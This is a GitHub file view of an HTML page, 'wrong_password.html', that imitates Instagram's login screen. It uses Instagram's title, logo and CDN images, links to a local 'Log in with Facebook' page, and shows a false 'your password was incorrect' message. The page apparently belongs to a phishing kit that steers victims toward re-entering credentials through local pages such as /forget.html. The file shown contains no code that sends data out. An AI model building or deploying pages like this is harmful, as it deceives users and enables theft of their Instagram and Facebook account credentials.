-
Notifications
You must be signed in to change notification settings - Fork 22
/
wrong_password.html
90 lines (85 loc) · 3.18 KB
/
wrong_password.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Login . Instagram</title>
<link rel="stylesheet" href="wrong_password.css">
<link rel="shortcut icon" href="/Instagram_logo_2016.svg.webp">
<style>
img {
vertical-align: text-top;
}
</style>
</head>
<body>
<div class="container">
<div class="box">
<div class="heading"></div>
<form class="login-form">
<div class="field">
<input id="username" type="name" placeholder="Phone number, username, or email" />
<label for="username">Phone number, username, or email</label>
</div>
<div class="field">
<input id="password" type="password" placeholder="password" />
<label for="password">Password</label>
</div>
<button class="login-button" title="login"><a href="/forget.html">Log In</a></button>
<div class="separator">
<div class="line"></div>
<p>OR</p>
<div class="line"></div>
</div>
<div class="other">
<button class="fb-login-btn" type="button">
<i class="fa fa-facebook-official fb-icon"></i>
<span class=""><img src="https://icons.iconarchive.com/icons/paomedia/small-n-flat/1024/social-facebook-icon.png"height="15" width="15"><a href="facebook-login.html"> Log in with Facebook</a>
</span>
</button>
<div class="wrong-password">Sorry, your password was incorrect. Please double-check your password.</div>
<br>
<a class="forgot-password" href="/forget.html">Forgot password?</a>
</div>
</form>
</div>
<div class="box">
<p>Don't have an account? <a class="signup" href="/forget.html">Sign Up</a></p>
</div>
</div>
<br>
<div class="get">
Get the app.
</div>
<br>
<div class="apps">
<a href="/forget.html">
<img src="https://static.cdninstagram.com/rsrc.php/v3/yz/r/c5Rp7Ym-Klz.png" height="40"
width="134"></a>     <a href="/forget.html">
<img src="https://static.cdninstagram.com/rsrc.php/v3/yu/r/EHY6QnZYdNX.png" height="40" width="134"></a>
</div>
<br>
<div class="footer">
<footer>
Meta
About
Blog
Jobs
Help
API
Privacy
Terms
Top Accounts
Hashtags
Locations
Instagram Lite
Contact Uploading & Non-Users
</footer>
</div>
<div class="copyright">
<br>
English © 2022 Instagram from Meta
</div>
</body>
</html>